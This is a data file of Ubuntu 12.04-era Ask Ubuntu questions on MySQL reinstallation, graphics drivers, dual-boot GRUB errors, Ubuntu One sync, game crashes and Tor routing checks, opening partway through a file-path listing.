/home/pkr/.local/share/akonadi/db_data/mysql/columns_priv.myi /home/pkr/.local/share/akonadi/db_data/mysql/columns_priv.frm /home/pkr/.local/share/akonadi/db_data/mysql/db.myd /home/pkr/.local/share/akonadi/db_data/mysql/db.myi /home/pkr/.local/share/akonadi/db_data/mysql/db.frm /home/pkr/.local/share/akonadi/db_data/mysql/event.myd /home/pkr/.local/share/akonadi/db_data/mysql/event.myi /home/pkr/.local/share/akonadi/db_data/mysql/event.frm /home/pkr/.local/share/akonadi/db_data/mysql/func.myd /home/pkr/.local/share/akonadi/db_data/mysql/func.myi /home/pkr/.local/share/akonadi/db_data/mysql/func.frm /home/pkr/.local/share/akonadi/db_data/mysql/general_log.csm /home/pkr/.local/share/akonadi/db_data/mysql/general_log.csv /home/pkr/.local/share/akonadi/db_data/mysql/general_log.frm /home/pkr/.local/share/akonadi/db_data/mysql/help_category.myd /home/pkr/.local/share/akonadi/db_data/mysql/help_category.myi /home/pkr/.local/share/akonadi/db_data/mysql/help_category.frm /home/pkr/.local/share/akonadi/db_data/mysql/help_keyword.myd /home/pkr/.local/share/akonadi/db_data/mysql/help_keyword.myi /home/pkr/.local/share/akonadi/db_data/mysql/help_keyword.frm /home/pkr/.local/share/akonadi/db_data/mysql/help_relation.myd /home/pkr/.local/share/akonadi/db_data/mysql/help_relation.myi /home/pkr/.local/share/akonadi/db_data/mysql/help_relation.frm /home/pkr/.local/share/akonadi/db_data/mysql/help_topic.myd /home/pkr/.local/share/akonadi/db_data/mysql/help_topic.myi /home/pkr/.local/share/akonadi/db_data/mysql/help_topic.frm /home/pkr/.local/share/akonadi/db_data/mysql/host.myd /home/pkr/.local/share/akonadi/db_data/mysql/host.myi /home/pkr/.local/share/akonadi/db_data/mysql/host.frm /home/pkr/.local/share/akonadi/db_data/mysql/ndb_binlog_index.myd /home/pkr/.local/share/akonadi/db_data/mysql/ndb_binlog_index.myi /home/pkr/.local/share/akonadi/db_data/mysql/ndb_binlog_index.frm /home/pkr/.local/share/akonadi/db_data/mysql/plugin.myd /home/pkr/.local/share/akonadi/db_data/mysql/plugin.myi /home/pkr/.local/share/akonadi/db_data/mysql/plugin.frm /home/pkr/.local/share/akonadi/db_data/mysql/proc.myd /home/pkr/.local/share/akonadi/db_data/mysql/proc.myi /home/pkr/.local/share/akonadi/db_data/mysql/proc.frm /home/pkr/.local/share/akonadi/db_data/mysql/procs_priv.myd /home/pkr/.local/share/akonadi/db_data/mysql/procs_priv.myi /home/pkr/.local/share/akonadi/db_data/mysql/procs_priv.frm /home/pkr/.local/share/akonadi/db_data/mysql/proxies_priv.myd /home/pkr/.local/share/akonadi/db_data/mysql/proxies_priv.myi /home/pkr/.local/share/akonadi/db_data/mysql/proxies_priv.frm /home/pkr/.local/share/akonadi/db_data/mysql/servers.myd /home/pkr/.local/share/akonadi/db_data/mysql/servers.myi /home/pkr/.local/share/akonadi/db_data/mysql/servers.frm /home/pkr/.local/share/akonadi/db_data/mysql/slow_log.csm /home/pkr/.local/share/akonadi/db_data/mysql/slow_log.csv /home/pkr/.local/share/akonadi/db_data/mysql/slow_log.frm /home/pkr/.local/share/akonadi/db_data/mysql/tables_priv.myd /home/pkr/.local/share/akonadi/db_data/mysql/tables_priv.myi /home/pkr/.local/share/akonadi/db_data/mysql/tables_priv.frm /home/pkr/.local/share/akonadi/db_data/mysql/time_zone.myd /home/pkr/.local/share/akonadi/db_data/mysql/time_zone.myi /home/pkr/.local/share/akonadi/db_data/mysql/time_zone.frm /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_leap_second.myd /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_leap_second.myi /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_leap_second.frm /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_name.myd /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_name.myi /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_name.frm /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_transition.myd /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_transition.myi /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_transition.frm /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_transition_type.myd /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_transition_type.myi /home/pkr/.local/share/akonadi/db_data/mysql/time_zone_transition_type.frm /home/pkr/.local/share/akonadi/db_data/mysql/user.myd /home/pkr/.local/share/akonadi/db_data/mysql/user.myi /home/pkr/.local/share/akonadi/db_data/mysql/user.frm /usr/bin/mysql /usr/bin/mysql_install_db /usr/bin/mysql_upgrade /usr/bin/mysqlcheck /usr/sbin/mysqld /usr/share/mysql /usr/share/app-install/desktop/gmysqlcc : gmysqlcc.desktop /usr/share/app-install/desktop/mysql-client.desktop /usr/share/app-install/desktop/mysql-navigator : mysql-navigator.desktop /usr/share/app-install/desktop/mysql-server.desktop /usr/share/app-install/icons/gmysqlcc-32.png /usr/share/app-install/icons/mysql-navigator.png /usr/share/doc/mysql-client-core-5.5 /usr/share/doc/mysql-server-core-5.5 /usr/share/kde4/apps/katepart/syntax/sql-mysql.xml /usr/share/man/man1/mysql.1.gz /usr/share/man/man1/mysql_install_db.1.gz /usr/share/man/man1/mysql_upgrade.1.gz /usr/share/man/man1/mysqlcheck.1.gz /usr/share/man/man8/mysqld.8.gz /var/cache/apt/archives/akonadi-backend-mysql_1.7.2-0ubuntu1_all.deb /var/cache/apt/archives/libmysqlclient-dev_5.5.22-0ubuntu1_i386.deb /var/cache/apt/archives/libmysqlclient18_5.5.22-0ubuntu1_i386.deb /var/cache/apt/archives/libqt4-sql-mysql_4 % 3a4.8.1-0ubuntu4.1_i386.deb /var/cache/apt/archives/mysql-client-5.5_5.5.22-0ubuntu1_i386.deb /var/cache/apt/archives/mysql-client-core-5.5_5.5.22-0ubuntu1_i386.deb /var/cache/apt/archives/mysql-client_5.5.22-0ubuntu1_all.deb /var/cache/apt/archives/mysql-common_5.5.22-0ubuntu1_all.deb /var/cache/apt/archives/mysql-server-5.5_5.5.22-0ubuntu1_i386.deb /var/cache/apt/archives/mysql-server-core-5.5_5.5.22-0ubuntu1_i386.deb /var/cache/apt/archives/mysql-server_5.5.22-0ubuntu1_all.deb /var/lib/dpkg/info/mysql-client-core-5.5.list /var/lib/dpkg/info/mysql-client-core-5.5.md5sums /var/lib/dpkg/info/mysql-server-5.5.list /var/lib/dpkg/info/mysql-server-5.5.postrm /var/lib/dpkg/info/mysql-server-core-5.5.list /var/lib/dpkg/info/mysql-server-core-5.5.md5sums /var/log/mysql /var/log/mysql.err /var/log/mysql.log /var/log/mysql.log.1.gz /var/log/mysql.log.2.gz /var/log/mysql.log.3.gz /var/log/mysql.log.4.gz /var/log/mysql.log.5.gz /var/log/mysql.log.6.gz /var/log/mysql.log.7.gz /var/log/upstart/mysql.log.1.gz /var/log/upstart/mysql.log.2.gz /var/log/upstart/mysql.log.3.gz /var/log/upstart/mysql.log.4.gz /var/log/upstart/mysql.log.5.gz /var/log/upstart/mysql.log.6.gz /var/log/upstart/mysql.log.7.gz what should i do now ? please help me out in this : ( i was trying to find out if there is any way i can remove mysql related every file and then reinstall mysql . i need it for qt connectivity . i do n't understand what to do ! please help : (
145432	can i use compiz with gnome shell ?	can i use compiz with gnome shell in ubuntu 12.04 ? if i can , how ? i must use compiz -- replace to start compiz , but then the top panel and activities disappears .
145437	the installer encountered an unrecoverable error and will now reboot	or `` and will now run a desktop ... . '' i tried installing it with a cd.. it installs ubuntu to a certain point and then stops ( after the name password window ) .. the last thing i see before the error pops up is a big white window with an `` > '' on the right side . i tried to gather some debug info via ctrl+alt+f2 but whenever i type something in it tells me i do not have permission to do so .
145439	how do i enable the nvidia geforce gtx 570 ?	i just installed 12.04 , it was running smoothly and i downloaded and installed all the recommended updates . after checking the details pane of the system settings window i noticed that the gtx 570 didnt show up as graphics unit . because of this i figured i needed to download the drivers like i would have needed to in windows . so i did this but being a complete newbie to linux i did n't succeed in installing them . ( i think ) anyway after several tries and errors i shut down the pc and restarted it . this resulted in no signal to my screen after trying to reboot -- with all the monitor outs affected . i took out the graphics card and now it boots normally but after booting it says there is a problem with the system the graphics cant be recognized . here are my questions : what do i do ? i like linux but the arbitrary aspect of the errors that occur without any changes to the system -- other than physically removing my graphics card -- scare me . is there a beginners guide to ubuntu where i could start from scratch because i really want this to work ? now that the system is ( suddenly ) showing these graphic errors -- so far without visible consequence despite the error message -- should i reinstall the gpu and give the driver installation another try or the other way around ? i 'd be very grateful for any help . thank you in advance ! here are the specs of the system i have built . asus rock z77 extreme 4 intel i7 3770k 16 gb corsair ram zotac nvidia gtx 570 bequiet ! 630w power supply 120 gb ssd in response to comments requesting additional information here are some more steps i took . i checked the additional drivers program prior to and post trying to install the driver manually but nothing showed up whatsoever . i don't know if there is a `` corrupted '' /incomplete installation in existence somewhere on the system causing this . i do n't think i did actually install anything because of the output i received from the system ( which i remember as being along the lines of `` i do n't know what the heck you want from me '' ) . the only thing that did happen once was when i double clicked on something and a loading bar popped up -- but at the end it said an error occurred and could only be closed . i am only beginning to get used to working with a terminal . should i physically reinstall the gpu and give the additional drivers route another try ? or is a manual installation of the required drivers a better idea ? i tried the jockey console first wehen i had the gpu installed but it did´nt shwo anything . after rebooting the pc wouldn´t signal the monitor so i took the card out again and wen´t through a couple of how-to´s downloading the synaptic package amnager and adding the x-swat repository to my system and upgrading the current and settings via the synaptics console . after that i figured it should be fine . so i reinstalled the gtx 570 and now it says ubuntu is running in low graphics mode an sometimes wont even take any futher input from the keyboard not even letting me into the console . so there is virtually no way of installing the drivers ( again ? ) with the card installed what to do i´m beginning to lose hope since it seems to work so easily for others . thx for the support .
145443	how do i use pm-suspend-hybrid by default instead of pm-suspend ?	i would like to use the hybrid suspend method instead of suspend when closing the lid or selecting `` suspend '' from the menu . i can imagine to change the pm-suspend script to do so automatically , but there might be a more maintainable / easier way .
145444	how do i remove the extra ubuntu option on the windows boot manager menu ?	i installed ubuntu using wubi side by side with windows . i decided to uninstall ubuntu and install kubuntu , which i did successfully . however now when i boot my computer , the windows boot manager displays 3 options : windows ubuntu kubuntu the ubuntu option does not work , but the entry did not get removed when i uninstalled ubuntu the first time . how do i get rid of this extra entry ?
145447	installing mysql complete ?	how i can install mysql in ubuntu 12.04 ( gnome 3 ) . so that i will have my mysql installation in /usr/bin/mysql it 's library and header files in /usr/lib/mysql and /usr/include/mysql respectively . last time i tried sudo apt-get install mysql-server mysql-client mysql-common the mysql has been installed in /usr/bin/mysql . it 's header files were in /usr/include/mysql but library files were not present . and libmysqlclient.so was in /usr/lib/i386-linux-gnu/ which should not be there . i need it to be in /usr/lib/mysql help me out in solving this problem : (
145455	when i press alt in firefox , firefox does not show the menue , but the title	i use ubuntu 12.04 64-bit and the newest firefox ( not aurora or beta but the usual ) . sorry for my bad english , i 'm german : d
145459	if i run compiz -- replace , all border and button of the window disappear	i would like to run compiz on my s.o . the problem is that if i run 'compiz -- replace ' , compiz start , but the upper border of the window ( with minimize , maximize button ) disappear ! i try to run also : gtk-window-decorator -- replace but without success . how could be the problem ? thanks
145463	how do i get sound in trine on 12.04 64-bit ?	whenever i try to play trine , it starts but i get no sound . in the terminal this error message appears : /o/g/trine > ./trine-launcher64 alsa lib conf.c:3314 : ( snd_config_hooks_call ) can not open shared library libasound_module_conf_pulse.so alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm default i have libasound2-plugins installed , which contains libasound_module_conf_pulse.so , how can i get trine to recognize it ? i tried starting the 32-bit version with linux32 as well , it crashes .
145466	dual boot problem with ubuntu 12.04 and vista	greetings from new zealand . i have installed microsoft windows vista and then installed ubuntu 12.04 on my refurbished compaq nx8220 laptop . i get the following infamous head hurting prompt continually . error : no such partition . grub rescue > have tried most of the common recommended solutions . live-cd then install boot-repair through the terminal did n't work . it repaired all the linux stuff when restoring grub and then ca n't boot into windows vista . when i use boot-repair to fix the mbr , then i ca n't boot into ubuntu . tried installing bcd 2.1 in vista and tried all the options one after another in bcd . still no ubuntu when selected through the options menu from bcd on restart/reboot . i have tried the boot repair option on the ubuntu server cd-rom , tried installing earlier versions of ubuntu 11.04 , 11.10 , and ubuntu server 11.10 and 12.04 . still the same result . i tried deleting the ubuntu partitions through vista a number of times and reinstalling ubuntu . i have been trying and retrying all the options in boot-repair in different combinations for the past week and a half . i have tried at least 10 times installing and reinstalling ubuntu . i really love ubuntu and believe i have exhausted most of the recommended solutions and have spent too much time on this . its driving me nuts ! ! please can someone help , i have finally given up ( sigh ) . the following are some outputs from boot-repair from my last attempts . http : //paste.ubuntu.com/1019227 http : //paste.ubuntu.com/1019264 i was only allowed to post two links being a newbie . the only thing left for me to do is the flying samoan dropkick laptop trick . thanks in advance . francis .
145467	crunchbang ! how to install on second hdd and have working grub	i really want to try crunchbang linux , but i have only ever used wubi to dual boot and i have only even installed a ubuntu based os . is it as simple as just installing via a cd on the second hard drive , or do i have to partition do i have to set up grub menu or will the grub menu just detect the 2 operating system and give me the choice to boot between the 2 just like wubi when installing wubi ? and will this effect my existing dual boot ubuntu partition ? this may not be very ubuntu related but after looking at various tutorials i just could nut understand , and people using ubuntu normally speak in a language i understand .
145468	updating nvidia driver to 295.53 in 12.04	i custom build linux kernels . i enjoy tinkering with the settings to try and slim down the build as much as possible . but here is the problem : the version of the nvidia drivers in oneric is too low to support linux 3.4 ( see this bug : https : //launchpad.net/bugs/993506 ) so in order to use linux 3.4 on my computer , i have several options : 1 ) use the source code hack ( moving a file from arm/ to x86/ ) ( i 'd rather not , as this may create problems later ) 2 ) install the driver using nvidia 's installer ( not really a good option as package conflicts would occur ( e.g . warzone2100 wo n't install because the driver package is n't installed ) ) 3 ) find some way of installing the ubuntu 295.53 package on this system ( either by installing the package directly from the launchpad link , building the package or through backports ( preferable ) ) so , i 'm assuming # 3 is the most correct way of doing it , and if so , what would be the best way then ? ps : i 'm not fussed about having it automatically update .
145478	ubuntu one file corruption	i tar ~/documents to create a backup and my .tgz file turns out to be about 683 mb . i allow my ubuntu one upload speed to be about 2.5 mb/s . the sync takes several hours . my power management setting is `` never suspend '' . i might on some occasions reboot ubuntu in the middle of the sync in order to switch to windows to print a file since ubuntu does not have a driver for my printer . i get no complaints so this seems like a permissible operation . after the sync completed i downloaded the file from the ubuntu one website . strangely the file is now 619 mb and using the diff utility i can see a message that says the binary files are not identical . double-clicking the downloaded .tgz file opens the archive manager and i get this : gzip : stdin : unexpected end of file tar : unexpected eof in archive tar : error is not recoverable : exiting now how did this file get corrupted ?
145480	why does update manager fail with `` `ain ' not known on line 1 '' in sources.list ?	could not initialise the package information an unresolvable problem occurred while initialising the package information . please report this bug for the 'update-manager ' package and try to include the following error message : 'e : type âainâ is not known on line 1 in source list /etc/apt/sources.list.d/michael-gruz-canon-precise.list'
145484	why are ubuntu one files in the cloud not the same size as the original ?	i tar ~/documents to create backups . my .tgz files are approximately 700mb . i have created three such files over the past 3 weeks and i used ubuntu one to protect these from loss . in all three cases , the file size reported on the ubuntu one website does not agree with the file size reported by nautilus . in all three cases , the file size in the cloud is several mb smaller than the one on the desktop file system . example : my 2012 may 10 backup is 761mb but on the cloud it is 726mb . why is this happening ?
145488	configure script throwing up gcc errors	i 'm trying to compile sdl-1.2.15 on ubuntu 12.04 http : //www.linuxfromscratch.org/blfs/view/svn/multimedia/sdl.html the install guide says that i need to start by calling the configure file . looking at the comments , this seems to be needed to create a makefile with which to compile the library . so , i start by typing : sudo sh ./configure to which i get the following error message : checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... configure : error : can not run c compiled programs . if you meant to cross compile , use ` -- host ' . see `config.log ' for more details . i 've checked the log file ( see below ) , but have been unable to determine the underlying problem . any ideas on how to proceed ? this file contains any messages produced by compilers while running configure , to aid debugging if configure makes a mistake . it was created by configure , which was generated by gnu autoconf 2.61 . invocation command line was $ ./configure # # -- -- -- -- - # # # # platform . # # # # -- -- -- -- - # # hostname = ubuntu uname -m = i686 uname -r = 3.2.0-24-generic-pae uname -s = linux uname -v = # 39-ubuntu smp mon may 21 18:54:21 utc 2012 /usr/bin/uname -p = unknown /bin/uname -x = unknown /bin/arch = unknown /usr/bin/arch -k = unknown /usr/convex/getsysinfo = unknown /usr/bin/hostinfo = unknown /bin/machine = unknown /usr/bin/oslevel = unknown /bin/universe = unknown path : /usr/local/sbin path : /usr/local/bin path : /usr/sbin path : /usr/bin path : /sbin path : /bin # # -- -- -- -- -- - # # # # core tests . # # # # -- -- -- -- -- - # # configure:2136 : checking build system type configure:2154 : result : i686-pc-linux-gnu configure:2176 : checking host system type configure:2191 : result : i686-pc-linux-gnu configure:2261 : checking for gcc configure:2277 : found /usr/bin/gcc configure:2288 : result : gcc configure:2526 : checking for c compiler version configure:2533 : gcc -- version > & 5 gcc ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 copyright ( c ) 2011 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . configure:2536 : $ ? = 0 configure:2543 : gcc -v > & 5 using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/lib/gcc/i686-linux-gnu/4.6/lto-wrapper target : i686-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.6.3-1ubuntu5 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.6/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.6 -- enable-shared -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.6 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-gnu-unique-object -- enable-plugin -- enable-objc-gc -- enable-targets=all -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=i686-linux-gnu -- host=i686-linux-gnu -- target=i686-linux-gnu thread model : posix gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) configure:2546 : $ ? = 0 configure:2553 : gcc -v > & 5 gcc : error : unrecognized option '-v' gcc : fatal error : no input files compilation terminated . configure:2556 : $ ? = 4 configure:2579 : checking for c compiler default output file name configure:2606 : gcc conftest.c > & 5 configure:2609 : $ ? = 0 configure:2647 : result : a.out configure:2664 : checking whether the c compiler works configure:2674 : ./a.out ./configure : line 2675 : ./a.out : permission denied configure:2677 : $ ? = 126 configure:2686 : error : can not run c compiled programs . if you meant to cross compile , use ` -- host ' . see `config.log ' for more details .
145489	likewise-open with win ad or ldap-auth-client with openldap server	i will like to know which of the following combinations is popular ; likewise-open with win ad or ldap-auth-client with openldap server thanks
145492	how do i revert updates/tweaks to get to a usable gui ?	i just installed 12.04 the other day and then ran into trouble upon restarting after installing updates . what i did before the problem occurred : i did not make many changes before this problem occurred . changes i did make included : downloading and installing adobe flash player ( off topic but : i am under the impression that java , `` c & c '' and shockwave can not be run in ubuntu . could anybody verify this ? ) i also installed gnome-tweak-tool and used it to install several themes . these themes worked well until restarting after the update . is it possible that one of these themes caused the problem ( in combination with the update or because of the restart ) ? installed 215 updates from update manager and restarted my system . current situation : unity 3d is unusable since restarting after running updates . when i log in after entering my password the following things happen : the overhead panel disappears and the screen goes black for a minute my wallpaper flashes for a couple seconds but then the screen goes black again after another minute the wallpaper reappears but nothing else does and i am not able to open anything or even right click . after 5 minutes i can finally get a right click menu eventually a box comes up warning about a compiz failure and asking to let it quit -- which i did . using the right click functionality i was able to create a new folder on the desktop and use this to open a file browser . in doing so i noticed that the downloads i had made were missing ( music , image files , etc. , even after unpacking several .zip and .rar files ) even though i believe that everything should still be there . any new windows that i create are un-closable/minimizable/movable/etc , because the window bars are missing . i have tried rebooting several times but the results are the same . i was able to browse some off the system settings windows by clicking on the wallpaper link in the right click menu . in doing so i navigated into the update manager and noticed that updates were selected to be accepted from some `` unsupported sources '' . i do not recall setting these options myself and wonder why these -- potentially dangerous -- options would be selected by default . unity 2d is usable but not free of bugs -- i stumbled across the ability to log into a unity 2d session while trying to log into unity 3d . so far i have only noticed one bug in unity 2d : the close , minimize and maximize buttons are invisible -- however they are still usable despite being invisible . what i need : i 'm very new to linux and ubuntu and still am in the feeling out stages . as such i will have some trouble answering clarifying questions . i have n't used the terminal yet and would probably not be comfortable using it without very clear instructions . what i do need is to know how i can roll back/remove all those updates so i can use my computer regularly again . i do believe that i could follow step-by-step instructions as long as they are clear and concise if someone knows what my problem is .
145496	ubuntu 12.04 does support 's drivers for hcl pdc laptop or should need to search and download it from internet	i want to shift from windows to ubuntu but afraid a bit to search the drivers for my laptop which is hcl pdc . can any of you tell me does the ubuntu support all type of drivers ( audio , video , blue tooth ) e.t.c or it will support a specific range . else do i need to search and install them after installing ubuntu in my laptop . any related post will be appreciated thanx in advance . ... .. < > < > < > < > ... ..
145497	permission to change a text file	after having bought the latest humble bundle , i am finding limbo not to perform greatly . the advice on the f & q site is q : limbo does not perform as well as i hoped for a : in the settings.txt file you can set the resolution and the target framerate lower . firstly delete everything below the ———identifers——- marker and then try “use30hz = true” and a backbufferheight lower than 720 . this file can be found here /opt/limbo/support/limbo/drive_c/program files/limbo/settings.txt so to edit i assumed the command to be gksudo gedit /opt/limbo/support/limbo/drive_c/program files/limbo/settings.txt this however opens a blank file as below where am i going wrong ? carter @ carter-desktop : ~ $ ls -l `` /opt/limbo/support/limbo/drive_c/program files/limbo/settings.txt '' ls : can not access /opt/limbo/support/limbo/drive_c/program files/limbo/settings.txt : no such file or directory carter @ carter-desktop : ~ $ the file is there and looks like this
145502	differences between cloning an installation and doing a fresh installation	from what an end user might experience , what are the differences between cloning to a new pc/laptop an already installed , configured and updated system or doing a fresh installation assuming that the installation settings are the same , for example : the user name is the same the computer name is the same the timezone is the same what will be configure is the same ( vlc will be installed , the restricted extras will be installed , all the same packages will be installed ) are there any drawbacks/problems in cloning in comparison to freshly installing and vice versa . what advantages does one have over the other .
145506	can someone tell are there any bug fixes to skype on ubuntu 12.04 ?	can someone tell me , are there any bug fixes to skype on ubuntu 12.04 ? when i closed skype without signing off then after when i needed to reopen it before i restart the computer it wo n't work , '' already running `` message appears , ie : it is running on the background ! .yes i can kill the process and re-open it but it is not the way skype should work !
145513	update manager not detecting upgrade to 12.04	i am using ubuntu 11.10 and update manager is not showing the option to upgrade it to 12.04 . i have selected the 'notify me of new ubuntu version : ' option to 'for any new version as suggested by some people , but still i am not getting the option to upgrade . screenshot of selecting option : screen shot of update manager not detecting upgrade :
145516	how to check command line requests routed thru tor ?	i think i have virtualbox set up so that all traffic originating from the guest os is routed through tor . tor is only installed on the host os and the web browsers on the guest os all report tor ip 's in europe when i test with seemyip.com . the host os shows my real ip when going to the same sites . but i initiate a lot of requests from the linux command line and i have n't been able to confirm to my satisfaction that these are routing through tor , though i have no reason to think they do not . when i use this command i get no output from the guest os , but my real ip from the host os : dig myip.opendns.com @ resolver1.opendns.com +short this bash file gives no output from either os : # ! /bin/bash echo your external ip address is : wget http : //www.whatismyip.com -o - -o /dev/null | grep ' < title > ' |\ sed -r 's/ < title > whatismyip\.com \- //g ' | sed -r 's/ < \/title > //g' exit 0 suggestions ?
145517	hwclock vs rcs.d/s11hwclock.sh what is the difference between the two ?	could someone kindly explain the difference between these two files ? hwclock.sh rcs.d/s11hwclock.sh i understand these files are both to do with the motherboard clock , but i dont see the difference ... ..
145518	how do i install nagios ?	i keep hearing about nagios , a really powerful tool for monitoring servers . how do i install it ?
145522	psychonauts humble indie bundle v error	when i try to load psychonauts it crashes and this is the result i get when running from teminal . any help or suggestions are greatly appreciated . shaneo @ laptop : ~ $ cd psychonauts/ shaneo @ laptop : ~/psychonauts $ ./psychonauts stubbed : fix up the rest of the sse code first at detectssesupport ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/mathgeneral.cpp:32 ) stubbed : write me ? at setpclanguage ( /home/icculus/projects/psychonauts/source/game/luatest/unixmain.cpp:120 ) stubbed : fix up the rest of the sse code first at detectcpucaps ( /home/icculus/projects/psychonauts/source/game/luatest/game/pcgameapp.cpp:223 ) stubbed : check lang envr var at _getdefaultgamelanguage ( /home/icculus/projects/psychonauts/source/game/luatest/game/gameapp.cpp:171 ) console created save path : /home/shaneo/.local/share/psychonauts write path : workresource stubbed : inline asm at ssemul_4x4_4x4_2arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:710 ) stubbed : inline asm at ssemul_4x4_4x4_3arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:698 ) ******** unit test failed ******** transport started daved : nclistensocket : listening on port 40001 stubbed : vk_* at initinputnames ( /home/icculus/projects/psychonauts/source/commonlibs/directx/sdlinput.cpp:1173 ) no joysticks detected stubbed : multisampling ? at initplatform ( /home/icculus/projects/psychonauts/source/commonlibs/dfgraphics/openglgraphics.cpp:1667 ) error : missing required opengl extensions : - gl_ext_texture_compression_s3tc start up completed in 0.13 seconds segmentation fault ( core dumped ) shaneo @ laptop : ~/psychonauts $
145525	how can i avoid the random restart of the xserver ?	i 'm using a desktop pc with 64bit ubuntu 12.04 ( kernel 3.2.0-24-generic ) . hardware specs are - intel core i7 cpu 860 @ 2,80ghz x 8 - nvidia geforce gts 250 - 750 gb hard disk ata wdc wd7501aals-00e3a0 ( for my /home partition ) - 128 gb solid-state disk ata plextor px-128m2s ( for all other partitions ) since i reinstalled the pc with ubuntu 12.04 the xserver restarts randomly . most times when i watch a video in the browser ( maybe a flash issue ? ) but sometimes the restart/crash appears when i 'm working in an text-editor . how can i locate the problem ? which information is needed for a useful answer ?
145528	how to run humble bundle v games on a system with nvidia twinview ?	when i run amnesia : dark descent or superbrothers : sword & sworcery , the games are stretched across both my monitors , like this : limbo crashes on start-up : how can i solve these problems ?
145530	launcher auto-hides but does not come back	i 'm using ubuntu 12.04 . if i switch on `` auto-hide launcher '' , it hides but does not reveal with the pointer , and only comes back on switching off auto-hide .
145537	how to configure remmina for vnc desktop sharing ?	i 'm trying to connect two pcs for desktop sharing , i was able to set up ssh shell and file sharing but i failed to connect to vnc server . there are additional packages that i need to install on my machines ? and how should i fill this dialog :
145538	unable to save files from code blocks only	i have an ntfs drive mounted in a folder /tejas i have created a new project using it in a folder in this drive but i am unable to save the changes , i get the following error message could n't save project /tejas/project/codeblock/ciphers/ciphers.cbp ( maybe the file is write-protected ? ) i get similar message even when i try to save the c source file i am able to edit and save files using gedit editor ... why am i getting this problem ? edit : i have modified my fstab and added this line /dev/sda5/tejas ntfs uid=1000 , gid=1000 , defaults , umask=000 0 0 but it still does n't seem to work not working
145542	brightness settings wo n't change on an hp dv7t-6100 cto	i recently installed linux , and it seems my brightness settings will not change . i have keys on my laptop for it , and they lower and raise the brightness bar but the screen does not change brightness . help ? some specs : my laptop is a hp dv7t-6100 cto . i have linux ubuntu 12.04 lts dualbooted with windows 7 . i can provide more if you need to know .
145543	no sound on rakarrack 6.0.1	i just installed rakarrack and get no audio . i 'm using ubuntu 12.04 lts . help is appreciated .
145548	ubuntu system partition is running out of space after empty my trash , is it normal ?	i have just delete 4.1 go files from my desktop and after empty the trash . and now my / directory is up now to 100 % in use . i cant start anymore ubuntu . but i have access to safemode to clean the system check fsdisk etc ... but how i can free space from my system partition ? any ideas ? update : my problem wasnt the deleted files , but the real size of / directory . it was out of memory so my ubuntu can not be started correctly anymore .
145549	having problems with update manager	i 'm trying to update my ubuntu system , but can not do anything with the update manager . it loads up 3/4 of the way and then says : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : the package google-chrome-stable : i386 needs to be reinstalled , but i ca n't find an archive for it . ' also ubuntu software center will not open and keeps crashing . this is very annoying as i ca n't install or update anything .
145550	way to hide the side-pane in shotwell photo manager ?	the side-pane in shotwell takes up a lot of space . and it will only let users drag it bigger , not smaller . but ultimately , since i only interact with the side-pane once and a while , it would be preferable to be able to hide it completely . once hidden , i would like to be able to tap f3 as a shortcut key to unhide it . anyway to do this ?
145553	does ubuntu log events occurring during the boot ?	is there anywhere in the ubuntu ( or linux in general ) logs which can record a computer booting up and the os failing to load , due to a problem encountered during the boot stage ?
145554	gparted resize of an extended partition fails with error `` ca n't have overlapping partitions '' .	i just decided to install ubuntu 12.04 alongside windows 7 on my dell laptop . however i did n't do this manually but instead used the `` install ubuntu alongside windows 7 '' option during the installation . now the partition that ubuntu runs in has very little space and i am getting warning messages . i 'm trying to use gparted 0.12.1-5 ( via a live cd ) to give windows less space and give ubuntu more . i 've managed to remove 100gb from the windows partition so i now have some unallocated space between windows and ubuntu . this is what it looks like inside ubuntu ( not using the live cd , since it wo n't let me mount a usb to save a screenshot ) : so first i take sda4 ( extended ? ) and resize it to the left so it takes up all the unallocated space . then i resize sda5 ( ext4 ) as well so it takes up all the new space . however , when i hit apply , it fails on the first action ( resizing sd4 ) with the error message ca n't have overlapping partitions . any ideas as to why this happens ? i also tried resizing sda4 by just a few mb so that it definitely did n't overlap anything , but i still got the same error message . to clarify , i am using gparted from the livecd , i just took the screenshot from ubuntu . i could n't attach the details file containing the error information from gparted because i ca n't mount a usb drive when i 'm running from the livecd . i 'm tried following the guide on the gparted website but it says invalid argument or something like that . if the gparted details are needed , i may need some hints on how to solve the usb issue as well . : )
145557	overheating on vaio sb36	i have ubuntu 12.04 on my vaio sb36 and it overheats and the fan speed is at max . how should i fix it ? system specs : intel® core™ i5-2430m cpu unknown graphic detects ! ( it 's both intel and ati 6470m ) thanks in advance !
